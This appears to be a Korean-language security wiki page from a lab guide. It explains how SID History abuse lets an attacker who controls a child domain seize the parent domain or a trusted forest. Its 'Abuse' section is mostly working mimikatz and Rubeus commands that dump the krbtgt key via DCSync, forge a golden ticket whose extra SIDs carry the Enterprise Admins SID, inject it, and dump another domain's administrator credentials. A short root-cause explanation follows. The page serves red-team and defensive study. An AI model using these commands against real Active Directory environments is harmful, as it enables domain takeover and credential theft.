SID History
SID History는 도메인 계정이 외부로 마이그레이션 되었다가 돌아오는 경우를 대비하여 기존의 보안 식별자에 대한 정보를 유지하기 위해 사용되는 계정 속성입니다. 대상 도메인이 SID History에 대해 신뢰할 경우, 공격자는 하위 도메인을 장악한 뒤 티켓의 SID History 값을 변조하여 상위 도메인을 장악할 수 있습니다.
Abuse
# 트러스트 도메인 FQDN 및 SID 수집
.\mimikatz.exe "lsadump::trust" "exit"
# 현재 도메인 krbtgt 비밀 키
.\mimikatz.exe "lsadump::dcsync /user:child\krbtgt /domain:child.contoso.com" "exit"
# 교차 도메인 DCSync
.\mimikatz.exe "kerberos::golden /user:Administrator /krbtgt:6709f2afdea5f9182231dcc25e8430e8 /domain:child.contoso.com /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519" "exit"
.\mimikatz.exe "kerberos::ptt ticket.kirbi" "exit"
.\mimikatz.exe "lsadump::dcsync /domain:contoso.com /dc:ad01.contoso.com /user:contoso\Administrator" "exit"
# 크로스 도메인 SID
(Get-ADDomain -Server 'contoso.com').DomainSID.Value
# 현재 도메인 SID
(Get-ADDomain).DomainSID.Value
# 도메인 골든 티켓 생성
.\Rubeus.exe golden /aes256:f34[...]9c4 /user:Administrator /id:500 /domain:child.contoso.com /sid:<Child Domain Sid> /sids:<Parent Domain Sid> /dc:contoso.com /nowrap
Root Cause

실습 환경에서 CHILD와 KISA는 부모 자식 관계이고 CONTOSO는 외부 포레스트입니다. CONTOSO 도메인은 KISA 도메인의 엔터프라이즈 관리자 그룹에 대해 모든 권한을 위임한 상태이기 때문에 KISA 도메인 관리자는 CONTOSO에 DCSync 권한이 있습니다.

상황을 가정했기 때문에 외부 포레스트에 대해 모든 권한을 위임했지만 실제 시나리오에서는 하위 도메인이 상위 도메인 엔터프라이즈 관리자 그룹 권한을 탈취할 경우, 해당 도메인의 다른 자식 도메인을 재귀적으로 장악할 수 있습니다.
오프라인에서 위조한 골든 티켓의 PAC을 복호화하면 다음과 같이 ExtraSids 필드에 상위 도메인 엔터프라이즈 관리자 SID가 기입되어 있는 것이 확인됩니다.

References
Last updated
Was this helpful?